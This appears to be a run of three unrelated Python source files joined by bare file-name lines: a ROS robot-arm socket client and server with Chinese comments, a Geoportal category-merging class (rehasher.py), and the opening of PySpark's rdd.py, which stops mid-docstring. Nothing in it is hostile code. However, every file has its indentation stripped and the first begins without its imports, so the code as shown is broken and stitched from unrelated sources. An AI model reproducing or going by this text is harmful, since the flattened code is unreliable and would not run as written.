data = '0' #設定傳輸資料初始直
Arm_feedback = 1 #假設手臂忙碌
state_feedback = 0
NAME = 'socket_server'
client_response = 0 #回傳次數初始值
##------------class pos-------
class pos():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
##------------class socket_cmd---------
class socket_cmd():
def __init__(self, grip, setvel, ra, delay, setboth, action):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
raise StopIteration
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
##-----------client feedback arm state----------
def socket_client_arm_state(Arm_state):
global state_feedback
rospy.wait_for_service('arm_state')
try:
Arm_state_client = rospy.ServiceProxy('arm_state', arm_state)
state_feedback = Arm_state_client(Arm_state)
#pos_feedback_times = pos_feedback.response
return state_feedback
except rospy.ServiceException as e:
print ("Service call failed: %s"%e)
##-----------client feedback arm state end----------
##------------server -------
##--------touch strategy--------###
def point_data(req):
global client_response
pos.x = '%s'%req.x
pos.y = '%s'%req.y
pos.z = '%s'%req.z
pos.pitch = '%s'%req.pitch
pos.roll = '%s'%req.roll
pos.yaw = '%s'%req.yaw
client_response = client_response + 1
return(client_response)
##----------Arm Mode-------------###
def Arm_Mode(req):
socket_cmd.action = int('%s'%req.action)
socket_cmd.grip = int('%s'%req.grip)
socket_cmd.ra = int('%s'%req.ra)
socket_cmd.setvel = int('%s'%req.vel)
socket_cmd.setboth = int('%s'%req.both)
return(1)
##--------touch strategy end--------###
def socket_server():
rospy.init_node(NAME)
a = rospy.Service('arm_mode',arm_mode, Arm_Mode) ##server arm mode data
s = rospy.Service('arm_pos',arm_data, point_data) ##server arm point data
print ("Ready to connect")
rospy.spin() ## spin one
##------------server end-------
##----------socket 封包傳輸--------------##
##-----------socket client--------
def socket_client():
global Arm_feedback,data
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.0.1', 8080))#iclab 5
#s.connect(('192.168.1.102', 8080))#iclab computerx
except socket.error as msg:
print(msg)
sys.exit(1)
print('Connection has been successful')
print(s.recv(1024))
start_input=int(input('開始傳輸請按1,離開請按3 : '))
#start_input = 1
if start_input==1:
while 1:
##---------------socket 傳輸手臂命令-----------------
for case in switch(socket_cmd.action):
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
socket_cmd.action= 5
s.send(data.encode('utf-8'))#socket傳送for python to translate str
feedback_str = s.recv(1024)
#手臂端傳送手臂狀態
###test 0403
if str(feedback_str[2]) == '70':# F
feedback = 0
socket_client_arm_state(feedback)
#print("isbusy false")
if str(feedback_str[2]) == '84':# T
feedback = 1
socket_client_arm_state(feedback)
#print("isbusy true")
if str(feedback_str[2]) == '54':# 6
feedback = 6
socket_client_arm_state(feedback)
print("shutdown")
Arm_feedback = TCP.Is_busy(feedback)
###test 0403
##---------------socket 傳輸手臂命令 end-----------------
if Arm_feedback == Taskcmd.Arm_feedback_Type.shutdown:
rospy.on_shutdown(myhook)
break
if start_input == 3:
pass
s.close()
##-----------socket client end--------
##-------------socket 封包傳輸 end--------------##
## 多執行緒
def thread_test():
socket_client()
## 多執行序 end
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
socket_cmd.action = 5
t = threading.Thread(target=thread_test)
t.start()
socket_server()
t.join()
# Ctrl+K Ctrl+C 添加行注释 Add line comment
# Ctrl+K Ctrl+U 删除行注释 Remove line comment
#Ctrl+] / [ 缩进/缩进行 Indent/outdent line
|
rehasher.py
|
"""
Author: Michel Peltriaux
Organization: Spatial data infrastructure Rheinland-Pfalz, Germany
Contact: michel.peltriaux@vermkv.rlp.de
Created on: 22.01.19
"""
import threading
from collections import OrderedDict
from Geoportal.utils import utils
class Rehasher:
""" Merges categories and filters from all search result types (wms, wfs, dataset, wmc) into one dict for better handling
"""
def __init__(self, categories: dict, filters):
""" Constructor
Args:
categories (dict): Specifies which categories/resource types shall be worked on
filters: Specifies which filters will be used for rehashing
"""
self.all_categories = []
self.all_filters = filters
for category_key, category_val in categories.items():
self.all_categories.append(categories[category_key]["categories"]["searchMD"]["category"])
self.rehashed_categories = OrderedDict()
self.rehashed_filters = OrderedDict()
self.__parent_categories = []
self.__rehash()
self.__sort_by_count()
self.__mapbender_category_translation()
def __search_and_handle_subcat(self, c_subcat, rehashed_categories):
""" Searches a specific subcategory and recalculates the parent category count number
Since rehashing works multithreaded, we use these private functions for intra-class usage only!
Recounts the occurences of a specific subcategory in the rehashed categories
and updates the count number for the parent category.
Only one subcategory per call will be searched and handled
Args:
c_subcat: Specifies the subcategory that we are looking for
rehashed_categories (list): A list with categories that shall be handled
Returns:
bool: True if the subcategory was found and handled, False otherwise.
"""
ret_val = False
for rehashed_category in rehashed_categories:
if rehashed_category["title"] == c_subcat["title"]:
# found the subcat in the rehashed categories
# update count number
rehashed_category["count"] = int(rehashed_category["count"]) + int(c_subcat["count"])
ret_val = True
break
return ret_val
def __sort_by_count(self):
""" Sort facets by number of count
Returns:
nothing
"""
for category_key, category_val in self.rehashed_categories.items():
category_val.sort(key=lambda x: int(x["count"]), reverse= True)
def __rehash_single_thread(self, datatype):
""" Rehashing of a single datatype
This is one of multiple multithreaded calls. Each datatype has its own
thread to be handled in.
Args:
datatype: Specifies the datatype that shall be handled.
Returns:
nothing
"""
for category in datatype:
# if there are no subcategories in the datatype but we haven't seen it yet, we take it anyway
# if there are no subcategories in this datatype and we know the category itself already, we pass it
if category.get("subcat", None) is None:
if category["title"] not in self.rehashed_categories:
self.rehashed_categories[category["title"]] = []
continue
else:
continue
if category["title"] not in self.rehashed_categories:
# this category is not know yet, add it!
self.rehashed_categories[category["title"]] = category["subcat"]
else:
# the category is already in the rehashed list
# we need to add the new subcategory elements to the existing ones
for c_subcat in category["subcat"]:
# if the category has already a subcat with the title of c_subcat we need to update the count number
# otherwise if the subcat we currently iterate over is not in the subcategories of the category, we append it
if not self.__search_and_handle_subcat(c_subcat, self.rehashed_categories[category["title"]]):
# Yes, the name is shitty, but if we got in this branch it means that we found no matching subcategory
# So we add the c_subcat to the list, since it seems to be unknown so far
self.rehashed_categories[category["title"]].append(c_subcat)
def __rehash(self):
""" Merges all four category dicts into one large.
Parent categories will be merged.
Count of subcategories will be updated.
Returns:
nothing
"""
thread_list = []
# 1) Rehash categories
for datatype in self.all_categories:
thread_list.append(threading.Thread(target=self.__rehash_single_thread, args=(datatype,)))
utils.execute_threads(thread_list)
# 2) Reorganize filter
# Reorganize means we need to get rid of certain elements, which are useless in this system and would disturb the handling in a later process
# only searchResources, orderFilter, maxResults and searchText from one datatype are needed, the rest is irrelevant
delete_keys = [
"isoCategories",
"searchResources",
"inspireThemes",
"customCategories",
"registratingDepartments"
]
for key in delete_keys:
if self.all_filters.get(key, None) is not None:
del self.all_filters[key]
self.rehashed_filters = self.all_filters
def __mapbender_category_translation(self):
""" Translates the rehashed categories
This is nessesary, as the return values are sometimes handled in German.
Returns:
nothing
"""
translated_facets = OrderedDict(("Custom" if rehashed_key == "Sonstige" else rehashed_key, rehashed_value) for rehashed_key, rehashed_value in self.rehashed_categories.items())
self.rehashed_categories = translated_facets
def get_rehashed_categories(self):
""" Getter for rehashed categories
Returns:
dict: The rehashed categories
"""
return self.rehashed_categories
def get_rehashed_filters(self):
""" Getter for rehashed filters
Returns:
dict: The rehashed filters
"""
return self.rehashed_filters
|
rdd.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import copy
import sys
import os
import operator
import shlex
import warnings
import heapq
import bisect
import random
from subprocess import Popen, PIPE
from threading import Thread
from collections import defaultdict
from itertools import chain
from functools import reduce
from math import sqrt, log, isinf, isnan, pow, ceil
from typing import (
Any,
Callable,
Dict,
Generic,
Hashable,
Iterable,
Iterator,
IO,
List,
NoReturn,
Optional,
Sequence,
Tuple,
Union,
TypeVar,
cast,
overload,
TYPE_CHECKING,
)
from pyspark.java_gateway import local_connect_and_auth
from pyspark.serializers import (
AutoBatchedSerializer,
BatchedSerializer,
NoOpSerializer,
CartesianDeserializer,
CloudPickleSerializer,
PairDeserializer,
CPickleSerializer,
Serializer,
pack_long,
read_int,
write_int,
)
from pyspark.join import (
python_join,
python_left_outer_join,
python_right_outer_join,
python_full_outer_join,
python_cogroup,
)
from pyspark.statcounter import StatCounter
from pyspark.rddsampler import RDDSampler, RDDRangeSampler, RDDStratifiedSampler
from pyspark.storagelevel import StorageLevel
from pyspark.resource.requests import ExecutorResourceRequests, TaskResourceRequests
from pyspark.resource.profile import ResourceProfile
from pyspark.resultiterable import ResultIterable
from pyspark.shuffle import (
Aggregator,
ExternalMerger,
get_used_memory,
ExternalSorter,
ExternalGroupBy,
)
from pyspark.traceback_utils import SCCallSiteSync
from pyspark.util import fail_on_stopiteration, _parse_memory
if TYPE_CHECKING:
import socket
import io
from pyspark._typing import NonUDFType
from pyspark._typing import S, NumberOrArray
from pyspark.context import SparkContext
from pyspark.sql.pandas._typing import (
PandasScalarUDFType,
PandasGroupedMapUDFType,
PandasGroupedAggUDFType,
PandasWindowAggUDFType,
PandasScalarIterUDFType,
PandasMapIterUDFType,
PandasCogroupedMapUDFType,
ArrowMapIterUDFType,
)
from pyspark.sql.dataframe import DataFrame
from pyspark.sql.types import AtomicType, StructType
from pyspark.sql._typing import AtomicValue, RowLike, SQLBatchedUDFType
from py4j.java_gateway import JavaObject # type: ignore[import]
from py4j.java_collections import JavaArray # type: ignore[import]
T = TypeVar("T")
T_co = TypeVar("T_co", covariant=True)
U = TypeVar("U")
K = TypeVar("K", bound=Hashable)
V = TypeVar("V")
V1 = TypeVar("V1")
V2 = TypeVar("V2")
V3 = TypeVar("V3")
__all__ = ["RDD"]
class PythonEvalType:
"""
Evaluation type of python rdd.
These values are internal to PySpark.
These values should match values in org.apache.spark.api.python.PythonEvalType.
"""
NON_UDF: "NonUDFType" = 0
SQL_BATCHED_UDF: "SQLBatchedUDFType" = 100
SQL_SCALAR_PANDAS_UDF: "PandasScalarUDFType" = 200
SQL_GROUPED_MAP_PANDAS_UDF: "PandasGroupedMapUDFType" = 201
SQL_GROUPED_AGG_PANDAS_UDF: "PandasGroupedAggUDFType" = 202
SQL_WINDOW_AGG_PANDAS_UDF: "PandasWindowAggUDFType" = 203
SQL_SCALAR_PANDAS_ITER_UDF: "PandasScalarIterUDFType" = 204
SQL_MAP_PANDAS_ITER_UDF: "PandasMapIterUDFType" = 205
SQL_COGROUPED_MAP_PANDAS_UDF: "PandasCogroupedMapUDFType" = 206
SQL_MAP_ARROW_ITER_UDF: "ArrowMapIterUDFType" = 207
def portable_hash(x: Hashable) -> int:
"""
This function returns consistent hash code for builtin types, especially
for None and tuple with None.
The algorithm is similar to that one used by CPython 2.7
Examples
--------
>>> portable_hash(None)
0
>>> portable_hash((None, 1)) & 0xffffffff
219750521
"""
if "PYTHONHASHSEED" not in os.environ:
raise RuntimeError("Randomness of hash of string should be disabled via PYTHONHASHSEED")
if x is None:
return 0
if isinstance(x, tuple):
h = 0x345678
for i in x:
h ^= portable_hash(i)
h *= 1000003
h &= sys.maxsize
h ^= len(x)
if h == -1:
h = -2
return int(h)
return hash(x)
class BoundedFloat(float):
"""
Bounded value is generated by approximate job, with confidence and low
bound and high bound.
Examples
--------
>>> BoundedFloat(100.0, 0.95, 95.0, 105.0)
100.0
"""
confidence: float
low: float
high: float
def __new__(cls, mean: float, confidence: float, low: float, high: float) -> "BoundedFloat":
obj = float.__new__(cls, mean)
obj.confidence = confidence
obj.low = low
obj.high = high
return obj
def _create_local_socket(sock_info: "JavaArray") -> "io.BufferedRWPair":
"""
Create a local socket that can be used to load deserialized data from the JVM
Parameters
----------
sock_info : tuple
Tuple containing port number and authentication secret for a local socket.
Returns
-------
sockfile file descriptor of the local socket
"""
sockfile: "io.BufferedRWPair"
sock: "socket.socket"
port: int = sock_info[0]
auth_secret: str = sock_info[1]
sockfile, sock = local_connect_and_auth(port, auth_secret)
# The RDD materialization time is unpredictable, if we set a timeout for socket reading
# operation, it will very possibly fail. See SPARK-18281.
sock.settimeout(None)
return sockfile
def _load_from_socket(sock_info: "JavaArray", serializer: Serializer) -> Iterator[Any]:
"""
Connect to a local socket described by sock_info and use the given serializer to yield data
Parameters
----------
sock_info : tuple
Tuple containing port number and authentication secret for a local socket.
serializer : :py:class:`Serializer`
The PySpark serializer to use
Returns
-------
result of :py:meth:`Serializer.load_stream`,
usually a generator that yields deserialized data
"""
sockfile = _create_local_socket(sock_info)
# The socket will be automatically closed when garbage-collected.
return serializer.load_stream(sockfile)
def _local_iterator_from_socket(sock_info: "JavaArray", serializer: Serializer) -> Iterator[Any]:
class PyLocalIterable:
"""Create a synchronous local iterable over a socket"""
def __init__(self, _sock_info: "JavaArray", _serializer: Serializer):
port: int
auth_secret: str
jsocket_auth_server: "JavaObject"
port, auth_secret, self.jsocket_auth_server = _sock_info
self._sockfile = _create_local_socket((port, auth_secret))
self._serializer = _serializer
self._read_iter: Iterator[Any] = iter([]) # Initialize as empty iterator
self._read_status = 1
def __iter__(self) -> Iterator[Any]:
while self._read_status == 1:
# Request next partition data from Java
write_int(1, self._sockfile)
self._sockfile.flush()
# If response is 1 then there is a partition to read, if 0 then fully consumed
self._read_status = read_int(self._sockfile)
if self._read_status == 1:
# Load the partition data as a stream and read each item
self._read_iter = self._serializer.load_stream(self._sockfile)
for item in self._read_iter:
yield item
# An error occurred, join serving thread and raise any exceptions from the JVM
elif self._read_status == -1:
self.jsocket_auth_server.getResult()
def __del__(self) -> None:
# If local iterator is not fully consumed,
if self._read_status == 1:
try:
# Finish consuming partition data stream
for _ in self._read_iter:
pass
# Tell Java to stop sending data and close connection
write_int(0, self._sockfile)
self._sockfile.flush()
except Exception:
# Ignore any errors, socket is automatically closed when garbage-collected
pass
return iter(PyLocalIterable(sock_info, serializer))
class Partitioner:
def __init__(self, numPartitions: int, partitionFunc: Callable[[Any], int]):
self.numPartitions = numPartitions
self.partitionFunc = partitionFunc
def __eq__(self, other: Any) -> bool:
return (
isinstance(other, Partitioner)
and self.numPartitions == other.numPartitions
and self.partitionFunc == other.partitionFunc
)
def __call__(self, k: Any) -> int:
return self.partitionFunc(k) % self.numPartitions
class RDD(Generic[T_co]):
"""
A Resilient Distributed Dataset (RDD), the basic abstraction in Spark.
Represents an immutable, partitioned collection of elements that can be
operated on in parallel.
"""
def __init__(
self,
jrdd: "JavaObject",
ctx: "SparkContext",
jrdd_deserializer: Serializer = AutoBatchedSerializer(CPickleSerializer()),
):
self._jrdd = jrdd
self.is_cached = False
self.is_checkpointed = False
self.has_resource_profile = False
self.ctx = ctx
self._jrdd_deserializer = jrdd_deserializer
self._id = jrdd.id()
self.partitioner: Optional[Partitioner] = None
def _pickled(self: "RDD[T]") -> "RDD[T]":
return self._reserialize(AutoBatchedSerializer(CPickleSerializer()))
def id(self) -> int:
"""
A unique ID for this RDD (within its SparkContext).
"""
return self._id
def __repr__(self) -> str:
return self._jrdd.toString()
def __getnewargs__(self) -> NoReturn:
# This method is called when attempting to pickle an RDD, which is always an error:
raise RuntimeError(
"It appears that you are attempting to broadcast an RDD or reference an RDD from an "
"action or transformation. RDD transformations and actions can only be invoked by the "
"driver, not inside of other transformations; for example, "
"rdd1.map(lambda x: rdd2.values.count() * x) is invalid because the values "
"transformation and count action cannot be performed inside of the rdd1.map "
"transformation. For more information, see SPARK-5063."
)
@property
def context(self) -> "SparkContext":
"""
The :class:`SparkContext` that this RDD was created on.
"""
return self.ctx
def cache(self: "RDD[T]") -> "RDD[T]":
"""
Persist this RDD with the default storage level (`MEMORY_ONLY`).
"""
self.is_cached = True
self.persist(StorageLevel.MEMORY_ONLY)
return self
def persist(self: "RDD[T]", storageLevel: StorageLevel = StorageLevel.MEMORY_ONLY) -> "RDD[T]":
"""
Set this RDD's storage level to persist its values across operations
after the first time it is computed. This can only be used to assign
a new storage level if the RDD does not have a storage level set yet.
If no storage level is specified defaults to (`MEMORY_ONLY`).
Examples
--------
>>> rdd = sc.parallelize(["b", "a", "c"])
>>> rdd.persist().is_cached
True
"""
self.is_cached = True
javaStorageLevel = self.ctx._getJavaStorageLevel(storageLevel)
self._jrdd.persist(javaStorageLevel)
return self
def unpersist(self: "RDD[T]", blocking: bool = False) -> "RDD[T]":
"""
Mark the RDD as non-persistent, and remove all blocks for it from
memory and disk.
.. versionchanged:: 3.0.0
Added optional argument `blocking` to specify whether to block until all
blocks are deleted.
"""
self.is_cached = False
self._jrdd.unpersist(blocking)
return self
def checkpoint(self) -> None:
"""
Mark this RDD for checkpointing. It will be saved to a file inside the
checkpoint directory set with :meth:`SparkContext.setCheckpointDir` and
all references to its parent RDDs will be removed. This function must
be called before any job has been executed on this RDD. It is strongly
recommended that this RDD is persisted in memory, otherwise saving it
on a file will require recomputation.
"""
self.is_checkpointed = True
self._jrdd.rdd().checkpoint()
def isCheckpointed(self) -> bool:
"""
Return whether this RDD is checkpointed and materialized, either reliably or locally.
"""
return self._jrdd.rdd().isCheckpointed()
def localCheckpoint(self) -> None:
"""
Mark this RDD for local checkpointing using Spark's existing caching layer.
This method is for users who wish to truncate RDD lineages while skipping the expensive
step of replicating the materialized data in a reliable distributed file system. This is
useful for RDDs with long lineages that need to be truncated periodically (e.g. GraphX).
Local checkpointing sacrifices fault-tolerance for performance. In particular, checkpointed
data is written to ephemeral local storage in the executors instead of to a reliable,
fault-tolerant storage. The effect is that if an executor fails during the computation,
the checkpointed data may no longer be accessible, causing an irrecoverable job failure.
This is NOT safe to use with dynamic allocation, which removes executors along
with their cached blocks. If you must use both features, you are advised to set
`spark.dynamicAllocation.cachedExecutorIdleTimeout` to a high value.
The checkpoint directory set through :meth:`SparkContext.setCheckpointDir` is not used.
"""
self._jrdd.rdd().localCheckpoint()
def isLocallyCheckpointed(self) -> bool:
"""
Return whether this RDD is marked for local checkpointing.
Exposed for testing.
"""
return self._jrdd.rdd().isLocallyCheckpointed()
def getCheckpointFile(self) -> Optional[str]:
"""
Gets the name of the file to which this RDD was checkpointed
Not defined if RDD is checkpointed locally.
"""
checkpointFile = self._jrdd.rdd().getCheckpointFile()
return checkpointFile.get() if checkpointFile.isDefined() else None
def map(self: "RDD[T]", f: Callable[[T], U], preservesPartitioning: bool = False) -> "RDD[U]":
"""
Return a new RDD by applying a function to each element of this RDD.
Examples
--------
>>> rdd = sc.parallelize(["b", "a", "c"])
>>> sorted(rdd.map(lambda x: (x, 1)).collect())
[('a', 1), ('b', 1), ('c', 1)]
"""
def func(_: int, iterator: Iterable[T]) -> Iterable[U]:
return map(fail_on_stopiteration(f), iterator)
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def flatMap(
self: "RDD[T]", f: Callable[[T], Iterable[U]], preservesPartitioning: bool = False
) -> "RDD[U]":
"""
Return a new RDD by first applying a function to all elements of this
RDD, and then flattening the results.
Examples
--------
>>> rdd = sc.parallelize([2, 3, 4])
>>> sorted(rdd.flatMap(lambda x: range(1, x)).collect())
[1, 1, 1, 2, 2, 3]
>>> sorted(rdd.flatMap(lambda x: [(x, x), (x, x)]).collect())
[(2, 2), (2, 2), (3, 3), (3, 3), (4, 4), (4, 4)]
"""
def func(_: int, iterator: Iterable[T]) -> Iterable[U]:
return chain.from_iterable(map(fail_on_stopiteration(f), iterator))
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def mapPartitions(
self: "RDD[T]", f: Callable[[Iterable[T]], Iterable[U]], preservesPartitioning: bool = False
) -> "RDD[U]":
"""
Return a new RDD by applying a function to each partition of this RDD.
Examples
--------
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> def f(iterator): yield sum(iterator)
>>> rdd.mapPartitions(f).collect()
[3, 7]
"""
def func(_: int, iterator: Iterable[T]) -> Iterable[U]:
return f(iterator)
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def mapPartitionsWithIndex(
self: "RDD[T]",
f: Callable[[int, Iterable[T]], Iterable[U]],
preservesPartitioning: bool = False,
) -> "RDD[U]":
"""
Return a new RDD by applying a function to each partition of this RDD,
while tracking the index of the original partition.
Examples
--------
>>> rdd = sc.parallelize([1, 2, 3, 4], 4)
>>> def f(splitIndex, iterator): yield splitIndex
>>> rdd.mapPartitionsWithIndex(f).sum()
6
"""
return PipelinedRDD(self, f, preservesPartitioning)
def mapPartitionsWithSplit(
self: "RDD[T]",
f: Callable[[int, Iterable[T]], Iterable[U]],
preservesPartitioning: bool = False,
) -> "RDD[U]":
"""
Return a new RDD by applying a function to each partition of this RDD,
while tracking the index of the original partition.
.. deprecated:: 0.9.0
use :py:meth:`RDD.mapPartitionsWithIndex` instead.
Examples
--------
>>> rdd = sc.parallelize([1, 2, 3, 4], 4)
>>> def f(splitIndex, iterator): yield splitIndex
>>> rdd.mapPartitionsWithSplit(f).sum()
6
"""
warnings.warn(
"mapPartitionsWithSplit is deprecated; use mapPartitionsWithIndex instead",
FutureWarning,
stacklevel=2,
)
return self.mapPartitionsWithIndex(f, preservesPartitioning)
def getNumPartitions(self) -> int:
"""
Returns the number of partitions in RDD
Examples
--------
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> rdd.getNumPartitions()
2
"""
return self._jrdd.partitions().size()
def filter(self: "RDD[T]", f: Callable[[T], bool]) -> "RDD[T]":
"""
Return a new RDD containing only the elements that satisfy a predicate.
Examples
--------
>>> rdd = sc.parallelize([1, 2, 3, 4, 5])
>>> rdd.filter(lambda x: x % 2 == 0).collect()
[2, 4]
"""
def func(iterator: Iterable[T]) -> Iterable[T]:
return filter(fail_on_stopiteration(f), iterator)
return self.mapPartitions(func, True)
def distinct(self: "RDD[T]", numPartitions: Optional[int] = None) -> "RDD[T]":
"""
Return a new RDD containing the distinct elements in this RDD.
Examples
--------
>>> sorted(sc.parallelize([1, 1, 2, 3]).distinct().collect())
[1, 2, 3]
"""
return (
self.map(lambda x: (x, None))
.reduceByKey(lambda x, _: x, numPartitions)
.map(lambda x: x[0])
)
def sample(
self: "RDD[T]", withReplacement: bool, fraction: float, seed: Optional[int] = None
) -> "RDD[T]":
"""
Return a sampled subset of this RDD.
Parameters
----------
withReplacement : bool
can elements be sampled multiple times (replaced when sampled out)
fraction : float
expected size of the sample as a fraction of this RDD's size
without replacement: probability that each element is chosen; fraction must be [0, 1]
with replacement: expected number of times each element is chosen; fraction must be >= 0
seed : int, optional
seed for the random number generator
Notes
-----
This is not guaranteed to provide exactly the fraction specified of the total
count of the given :class:`DataFrame`.
Examples
--------
>>> rdd = sc.parallelize(range(100), 4)
>>> 6 <= rdd.sample(False, 0.1, 81).count() <= 14
True
"""
assert fraction >= 0.0, "Negative fraction value: %s" % fraction
return self.mapPartitionsWithIndex(RDDSampler(withReplacement, fraction, seed).func, True)
def randomSplit(
self: "RDD[T]", weights: Sequence[Union[int, float]], seed: Optional[int] = None
) -> "List[RDD[T]]":
"""
Randomly splits this RDD with the provided weights.
weights : list
weights for splits, will be normalized if they don't sum to 1
seed : int, optional
random seed
Returns
-------
list
split RDDs in a list
Examples
--------
>>> rdd = sc.parallelize(range(500), 1)
>>> rdd1, rdd2 = rdd.randomSplit([2, 3], 17)
>>> len(rdd1.collect() + rdd2.collect())
500
>>> 150 < rdd1.count() < 250
True
>>> 250 < rdd2.count() < 350
True
"""
s = float(sum(weights))
cweights = [0.0]
for w in weights:
cweights.append(cweights[-1] + w / s)
if seed is None:
seed = random.randint(0, 2 ** 32 - 1)
return [
self.mapPartitionsWithIndex(RDDRangeSampler(lb, ub, seed).func, True)
for lb, ub in zip(cweights, cweights[1:])
]
# this is ported from scala/spark/RDD.scala
def takeSample(
self: "RDD[T]", withReplacement: bool, num: int, seed: Optional[int] = None
) -> List[T]:
"""
Return a fixed-size sampled subset of this RDD.
Notes
-----
This method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
Examples
--------
>>> rdd = sc.parallelize(range(0, 10))
>>> len(rdd.takeSample(True, 20, 1))
20
>>> len(rdd.takeSample(False, 5, 2))
5
>>> len(rdd.takeSample(False, 15, 3))
10
"""
numStDev = 10.0
if num < 0:
raise ValueError("Sample size cannot be negative.")
elif num == 0:
return []
initialCount = self.count()
if initialCount == 0:
return []
rand = random.Random(seed)
if (not withReplacement) and num >= initialCount:
# shuffle current RDD and return
samples = self.collect()
rand.shuffle(samples)
return samples
maxSampleSize = sys.maxsize - int(numStDev * sqrt(sys.maxsize))
if num > maxSampleSize:
raise ValueError("Sample size cannot be greater than %d." % maxSampleSize)
fraction = RDD._computeFractionForSampleSize(num, initialCount, withReplacement)
samples = self.sample(withReplacement, fraction, seed).collect()
# If the first sample didn't turn out large enough, keep trying to take samples;
# this shouldn't happen often because we use a big multiplier for their initial size.
# See: scala/spark/RDD.scala
while len(samples) < num:
# TODO: add log warning for when more than one iteration was run
seed = rand.randint(0, sys.maxsize)
samples = self.sample(withReplacement, fraction, seed).collect()
rand.shuffle(samples)
return samples[0:num]
@staticmethod
def _computeFractionForSampleSize(
sampleSizeLowerBound: int, total: int, withReplacement: bool
) -> float:
"""
Returns a sampling rate that guarantees a sample of
size >= sampleSizeLowerBound 99.99% of the time.
How the sampling rate is determined:
Let p = num / total, where num is the sample size and total is the
total number of data points in the RDD. We're trying to compute
q > p such that
- when sampling with replacement, we're drawing each data point
with prob_i ~ Pois(q), where we want to guarantee
Pr[s < num] < 0.0001 for s = sum(prob_i for i from 0 to
total), i.e. the failure rate of not having a sufficiently large
sample < 0.0001. Setting q = p + 5 * sqrt(p/total) is sufficient
to guarantee 0.9999 success rate for num > 12, but we need a
slightly larger q (9 empirically determined).
- when sampling without replacement, we're drawing each data point
with prob_i ~ Binomial(total, fraction) and our choice of q
guarantees 1-delta, or 0.9999 success rate, where success rate is
defined the same as in sampling with replacement.
"""
fraction = float(sampleSizeLowerBound) / total
if withReplacement:
numStDev = 5
if sampleSizeLowerBound < 12:
numStDev = 9
return fraction + numStDev * sqrt(fraction / total)
else:
delta = 0.00005
gamma = -log(delta) / total
return min(1, fraction + gamma + sqrt(gamma * gamma + 2 * gamma * fraction))
def union(self: "RDD[T]", other: "RDD[U]") -> "RDD[Union[T, U]]":
"""
Return the union of this RDD and another one.
Examples
--------
>>> rdd = sc.parallelize([1, 1, 2, 3])
>>> rdd.union(rdd).collect()
[1, 1, 2, 3, 1, 1, 2, 3]
"""
if self._jrdd_deserializer == other._jrdd_deserializer:
rdd: "RDD[Union[T, U]]" = RDD(
self._jrdd.union(other._jrdd), self.ctx, self._jrdd_deserializer
)
else:
# These RDDs contain data in different serialized formats, so we
# must normalize them to the default serializer.
self_copy = self._reserialize()
other_copy = other._reserialize()
rdd = RDD(self_copy._jrdd.union(other_copy._jrdd), self.ctx, self.ctx.serializer)
if (
self.partitioner == other.partitioner
and self.getNumPartitions() == rdd.getNumPartitions()
):
rdd.partitioner = self.partitioner
return rdd
def intersection(self: "RDD[T]", other: "RDD[T]") -> "RDD[T]":
"""
Return the intersection of this RDD and another one. The output will
not contain any duplicate elements, even if the input RDDs did.
Notes
-----
This method performs a shuffle internally.
Examples
--------
